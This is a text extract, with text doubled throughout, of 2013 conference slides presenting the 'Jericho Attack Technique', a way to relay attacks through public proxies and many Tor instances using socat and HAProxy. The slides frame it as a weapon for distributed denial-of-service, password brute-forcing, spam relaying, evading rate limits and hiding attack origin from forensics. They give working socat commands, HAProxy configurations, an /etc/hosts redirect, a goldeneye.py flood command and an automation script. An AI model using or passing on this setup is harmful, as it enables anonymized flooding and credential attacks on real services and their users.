Jericho Attack Technique

Jericho Attack TechniqueJericho Attack Technique
Cluster-bombing TCP attacks for maximum impactCluster-bombing TCP attacks for maximum impact
Jan SeidlJan Seidl
jseidl@wroot.orgjseidl@wroot.org
@jseidl@jseidl

$ whoami$ whoami
AboutAbout
Full Name: Jan SeidlFull Name: Jan Seidl
Origin: Rio de Janeiro, RJ – BrazilOrigin: Rio de Janeiro, RJ – Brazil
Work:Work:
●
CTO @ TI SafeCTO @ TI Safe
●
OpenSource contributor for: PEV, LogstashOpenSource contributor for: PEV, Logstash
●
Codes and snippets @ github.com/jseidlCodes and snippets @ github.com/jseidl
Features:Features:
●
UNIX Evangelist/Addict/Freak (but no fanboy!)UNIX Evangelist/Addict/Freak (but no fanboy!)
●
Python and C loverPython and C lover
●
Coffee dependentCoffee dependent
●
Hates printers and social networksHates printers and social networks
●
Proud DC Labs ResearcherProud DC Labs Researcher Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil

$ whoami$ whoami
Jericho Attack Technique. SEIDL, Jan

$ whoami$ whoami
STUPID, BROKE, NERD, BROKESTUPID, BROKE, NERD, BROKE

DisclaimerDisclaimer
‘‘Jericho’ is a product from the fictional company ‘StarkJericho’ is a product from the fictional company ‘Stark
Industries’ from “The Iron Man” movie franchise fromIndustries’ from “The Iron Man” movie franchise from
Paramount Pictures and Marvel Studios, as well as anyParamount Pictures and Marvel Studios, as well as any
related picture presented in this presentation.related picture presented in this presentation.
Please do not sue me.Please do not sue me.

x00 Overviewx00 Overview
x01 Application / Usesx01 Application / Uses
x02 Required Partsx02 Required Parts
x03 Weapon Assemblyx03 Weapon Assembly
x04 Weapon Tuningx04 Weapon Tuning
x05 Launching the attackx05 Launching the attack
x06 Weapon Maintenancex06 Weapon Maintenance
x07 Escalating Firepowerx07 Escalating Firepower
x08 Turning into a Smart Weaponx08 Turning into a Smart Weapon
x09 Demo!x09 Demo!
AgendaAgenda

OverviewOverview
The attack consists on utilizingThe attack consists on utilizing public SOCKS proxiespublic SOCKS proxies
andand TOR instancesTOR instances throughthrough socket multiplexingsocket multiplexing
softwaresoftware (e.g.: Load Balancing/Cluster software) as(e.g.: Load Balancing/Cluster software) as
relays for attacks in a load-balancing fashionrelays for attacks in a load-balancing fashion
At a glance

OverviewOverview
public SOCKS proxies + TOR instances + socketpublic SOCKS proxies + TOR instances + socket
multiplexing softwaremultiplexing software
At a glance

OverviewOverview
At a glance

OverviewOverview
Schematics
Attacker
Proxy 1
Proxy 2
Proxy 3
Proxy 4
Proxy 5
Proxy 6
Proxy 7
VictimHAProxy

OverviewOverview
Evading connection and rate limitingEvading connection and rate limiting
Bypassing country/origin restrictionsBypassing country/origin restrictions
Hiding origin of attacks, making forensics people sad :(Hiding origin of attacks, making forensics people sad :(
Low bandwidth attack such as Layer 7 DOS attacksLow bandwidth attack such as Layer 7 DOS attacks
Very efficient for
Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)
http://slidesha.re/14yYiuVhttp://slidesha.re/14yYiuV

OverviewOverview
At first HAProxy may seem as a load balancer strictlyAt first HAProxy may seem as a load balancer strictly
for HTTP(S), but it’s not.for HTTP(S), but it’s not.
HAProxy’s actual description is “The Reliable, HighHAProxy’s actual description is “The Reliable, High
PerformancePerformance TCPTCP/HTTP Load Balancer”./HTTP Load Balancer”.
Cool, huh?Cool, huh?
Paying closer attention

UsesUses
Applications for the Jericho Attack Technique

UsesUses
Web scraping/spideringWeb scraping/spidering
Limited API requestsLimited API requests
IP-based anti-fraud schemes (eg: Online Voting)IP-based anti-fraud schemes (eg: Online Voting)
User enumerationUser enumeration
Password brute-forcingPassword brute-forcing
Basic multiplexing use

UsesUses
Making Layer 7 Denial-of-Service attacks intoMaking Layer 7 Denial-of-Service attacks into
distributed configuration (DoS → DdoS)distributed configuration (DoS → DdoS)
(I like this one very much in particular)(I like this one very much in particular)
Hitting hard

UsesUses
Multiplexing mail relays for SPAMMultiplexing mail relays for SPAM
Multiplexing and anonymizing backdoor connections /Multiplexing and anonymizing backdoor connections /
commandscommands
Even more? Go crazy!Even more? Go crazy!
Going deeper

UsesUses
FTPFTP
SMTP(S) POP3(S) IMAP(S)SMTP(S) POP3(S) IMAP(S)
SSHSSH
RDP / VNCRDP / VNC
MySQLMySQL
many more...many more...
Possibly supported protocols

Required partsRequired parts
Building the weapon

Main assembly
Socat: Multipurpose RelaySocat: Multipurpose Relay
http://www.dest-unreach.org/socat/http://www.dest-unreach.org/socat/
SSL support:SSL support:
HTTPS, IMAPS, POPS, LDAPSHTTPS, IMAPS, POPS, LDAPS

Main assembly
HAProxyHAProxy
http://haproxy.1wt.eu/http://haproxy.1wt.eu/
““The Reliable, High Performance TCP/HTTP LoadThe Reliable, High Performance TCP/HTTP Load
Balancer”Balancer”
REQUEST → HAPROXY → { SERVER A, SERVER B,REQUEST → HAPROXY → { SERVER A, SERVER B,
SERVER C }SERVER C }

Resources
SOCKS/HTTP(S) ProxiesSOCKS/HTTP(S) Proxies
http://www.proxynova.com/proxy-server-list/http://www.proxynova.com/proxy-server-list/
http://hidemyass.com/proxy-list/http://hidemyass.com/proxy-list/
Just google it...Just google it...

Resources
TOR exit nodesTOR exit nodes
PRO TIP: You can run as many TOR tunnels as you want (:PRO TIP: You can run as many TOR tunnels as you want (:
tor --RunAsDaemon 1 --CookieAuthentication 0tor --RunAsDaemon 1 --CookieAuthentication 0
--HashedControlPassword "pwd" --ControlPort 4444 --PidFile--HashedControlPassword "pwd" --ControlPort 4444 --PidFile
torN.pid --SocksPort 9050 --DataDirectory data/torNtorN.pid --SocksPort 9050 --DataDirectory data/torN
Multi-TORMulti-TOR
https://github.com/jseidl/Multi-TOR/https://github.com/jseidl/Multi-TOR/
EX: ./multi-tor.sh 5 # Opens 5 TOR instancesEX: ./multi-tor.sh 5 # Opens 5 TOR instances

Important Note
The proxies may or may not require authentication since socatThe proxies may or may not require authentication since socat
supports proxy authentication adding the parameter as follows:supports proxy authentication adding the parameter as follows:
proxyauth=user:passproxyauth=user:pass

Important Note
Some public proxies append additional headers like X-Forwarded-For thatSome public proxies append additional headers like X-Forwarded-For that
may ruin the whole purpose of utilizing a Jericho attack perspective.may ruin the whole purpose of utilizing a Jericho attack perspective.
(Thanks for Lucas Fernando Amorim for remembering that!)(Thanks for Lucas Fernando Amorim for remembering that!)

Important Note
For TOR, one can useFor TOR, one can use two-hop circuits for maximumtwo-hop circuits for maximum
performance and degraded anonymityperformance and degraded anonymity oror greater-hopgreater-hop
circuits for greater anonymity and degraded performancecircuits for greater anonymity and degraded performance..
It just depends on the use.It just depends on the use.
Tor: Four Hops instead of ThreeTor: Four Hops instead of Three
http://coldwaterq.com/?11http://coldwaterq.com/?11
TOR Auto-circuitTOR Auto-circuit
https://thesprawl.org/projects/tor-autocircuit/https://thesprawl.org/projects/tor-autocircuit/
TOR control protocolTOR control protocol
https://thesprawl.org/research/tor-control-protocol/https://thesprawl.org/research/tor-control-protocol/

(not so) Important Note
I’ve developed a python tool named (albeit not very creatively)I’ve developed a python tool named (albeit not very creatively) proxygetproxyget..
BeautifulSoup + Mechanize = Smart Scraping!BeautifulSoup + Mechanize = Smart Scraping!
Scripting → HAProxy.conf auto-generation for a Jericho attackScripting → HAProxy.conf auto-generation for a Jericho attack
This tool is yet to be released. Stay tuned!This tool is yet to be released. Stay tuned!

Weapon AssemblyWeapon Assembly
Sticking the parts together
Easy simple steps:Easy simple steps:
1. Create lots of socat bindings to the victim, each from a1. Create lots of socat bindings to the victim, each from a
different resource (proxy or TOR instance)different resource (proxy or TOR instance)
2. Configure the locally bound socat ports in HAProxy2. Configure the locally bound socat ports in HAProxy
3. Point victim's DNS name to localhost on /etc/hosts3. Point victim's DNS name to localhost on /etc/hosts
4. Fire at will4. Fire at will

Sticking the parts together: socat with proxies
# socat TCP4-LISTEN:80# socat TCP4-LISTEN:80
PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080
Example:Example:

Sticking the parts together: socat with TOR
# socat TCP4LISTEN:80,fork# socat TCP4LISTEN:80,fork
SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050
SOCKS4A:localhost:93.184.216.119:80,socksport=9050SOCKS4A:localhost:93.184.216.119:80,socksport=9050
Example:Example:

Sticking the parts together: HAProxy
listen ddos 0.0.0.0:80listen ddos 0.0.0.0:80
mode tcpmode tcp
balancebalance roundrobinroundrobin
serverserver inst1 localhost:8080inst1 localhost:8080

Sticking the parts together: HAProxy (larger sample)
globalglobal
maxconn 10000maxconn 10000 # set this accordingly to MAX within your kernel socket limits# set this accordingly to MAX within your kernel socket limits
user haproxyuser haproxy
group haproxygroup haproxy
daemondaemon
defaultsdefaults
mode tcpmode tcp
retries 3retries 3
option redispatchoption redispatch
maxconn 20000maxconn 20000 # set accordingly# set accordingly
contimeout 5000contimeout 5000 # set accordingly# set accordingly
clitimeout 50000clitimeout 50000 # set accordingly# set accordingly
srvtimeout 50000srvtimeout 50000 # set accordingly# set accordingly
# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied
sockets.sockets.
listen jericho 0.0.0.0:80listen jericho 0.0.0.0:80 # just a instance name# just a instance name
mode tcpmode tcp
balance roundrobinbalance roundrobin # gives more time within socket/outoging IP reuse# gives more time within socket/outoging IP reuse
server inst1 localhost:8080server inst1 localhost:8080 # SOCKS proxy# SOCKS proxy
server inst2 localhost:9051server inst2 localhost:9051 # TOR instance# TOR instance
server inst3 localhost:9052server inst3 localhost:9052 # TOR instance# TOR instance

Sticking the parts together: /etc/hosts
# Jericho target below this line# Jericho target below this line
# make him suffer (:# make him suffer (:
example.com, www.example.comexample.com, www.example.com 127.0.0.1127.0.0.1

Ta-da!

Weapon TuningWeapon Tuning
Moar firepower!Moar firepower!

About performanceAbout performance
There are several parameters on the linux kernel that can beThere are several parameters on the linux kernel that can be
tuned in order to achieve better TCP performance.tuned in order to achieve better TCP performance.
Because ‘performance’ is relative to the attack being conductedBecause ‘performance’ is relative to the attack being conducted
(you may need more bandwidth or more concurrent connections(you may need more bandwidth or more concurrent connections
or anything else), there are several options that one mustor anything else), there are several options that one must
consider.consider.

Linux Tuning ResourcesLinux Tuning Resources
TCP Performance Tuning | SoftpanoramaTCP Performance Tuning | Softpanorama
http://bit.ly/17RiLWvhttp://bit.ly/17RiLWv
Linux Tweaking | Speedguide.netLinux Tweaking | Speedguide.net
http://bit.ly/18JDnlLhttp://bit.ly/18JDnlL
Improving TCP performance over a gigabit network with lots ofImproving TCP performance over a gigabit network with lots of
connections and high traffic of small packets | ServerFaultconnections and high traffic of small packets | ServerFault
http://bit.ly/1fRyjhZhttp://bit.ly/1fRyjhZ
Linux TCP/IP Tuning | LognormalLinux TCP/IP Tuning | Lognormal
http://bit.ly/17Rj8QNhttp://bit.ly/17Rj8QN

Launching the attackLaunching the attack

Check that everything is workingCheck that everything is working
You may want to socat resources first to an IP testing website toYou may want to socat resources first to an IP testing website to
verify that Jericho is working successfullyverify that Jericho is working successfully
Then rebind sockets to final destination (victim)Then rebind sockets to final destination (victim)
(don't forget the /etc/hosts entry!)(don't forget the /etc/hosts entry!)

Fire in the hole!Fire in the hole!
# ./goldeneye.py http://www.example.com/index.php -t# ./goldeneye.py http://www.example.com/index.php -t
1000 -m get1000 -m get
Ahhh... easy and transparent!Ahhh... easy and transparent!

Fire in the hole!Fire in the hole!

Weapon MaintenanceWeapon Maintenance

Check if your exit proxies are still working and not blockedCheck if your exit proxies are still working and not blocked
Check if your TOR identities aren't blockedCheck if your TOR identities aren't blocked
Gather new proxies and reconfigureGather new proxies and reconfigure
Renew TOR identities (tor_newid.sh, part of Multi-TOR)Renew TOR identities (tor_newid.sh, part of Multi-TOR)
Keeping the blade sharpKeeping the blade sharp

Watchdog daemons / scriptsWatchdog daemons / scripts
Cron jobsCron jobs
Manual checkingManual checking
Keeping the blade sharpKeeping the blade sharp

Escalating FirepowerEscalating Firepower
Multiple Jericho setups on many hostsMultiple Jericho setups on many hosts
++
Intermediary Forwarder/Multiplexer Jericho node(s)Intermediary Forwarder/Multiplexer Jericho node(s)
++
Multiple or single attack sourcesMultiple or single attack sources
Large-size clustered attack environmentsLarge-size clustered attack environments

Single-tier cascading Jericho architechtureSingle-tier cascading Jericho architechture

Multi-tier cascading Jericho architechtureMulti-tier cascading Jericho architechture

Turning into a smart weaponTurning into a smart weapon

Initialization SequenceInitialization Sequence
Define Resources
multi-tor.sh
proxyget.py IP PORT
list
TOR socket
list
joinlists.sh jericho.res

Automatic testingAutomatic testing
testresources.shjericho.res
all resources
valid?
proceed
gather and
revalidate
resources

Self-configurationSelf-configuration
initjericho.sh
list2socat.sh
list2haproxycfg.sh haproxy.cfg
jericho.res
reload
haproxy

Full routineFull routine
Initialize Configure Test Run

Poor-man's smart JerichoPoor-man's smart Jericho
# Gather proxy list
./proxyget.py --minanon high --minspd medium --type http --quantity 200
> /tmp/proxies
# Parse list
cut -f3,7 -d' ' /tmp/proxies > /tmp/parsedproxy
# Spawn socat entries
./gensocat.sh 93.184.216.119 /tmp/parsedproxy
# Reconfigure haproxy
echo "$HAPROXYCONF_HEAD" > /tmp/haproxy
./genhaproxycfg.sh 200 >> /tmp/haproxy
cp /etc/haproxy/haproxy.cfg /etc/haproxy/haproxy.cfg.old
cp /tmp/haproxy /etc/haproxy/haproxy.cfg
/etc/init.d/haproxy restart

What else?What else?
Web Interfaces?Web Interfaces?
API?API?
Cloud-hosted?Cloud-hosted?
Quick-deploy packages?Quick-deploy packages?
Jericho-as-a-Service (JaaS)?Jericho-as-a-Service (JaaS)?

Demo (:Demo (:
Jericho Attack Technique @ YouTubeJericho Attack Technique @ YouTube
http://youtu.be/YRMyW2OA0gIhttp://youtu.be/YRMyW2OA0gI

Questions?Questions?

Thank you!Thank you!
–– To peace!To peace!
jseidl@wroot.org / @jseidl / http://wroot.org

Jericho Attack Technique

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (17)

Similaire à Jericho Attack Technique

Similaire à Jericho Attack Technique (20)

Dernier

Dernier (20)

Jericho Attack Technique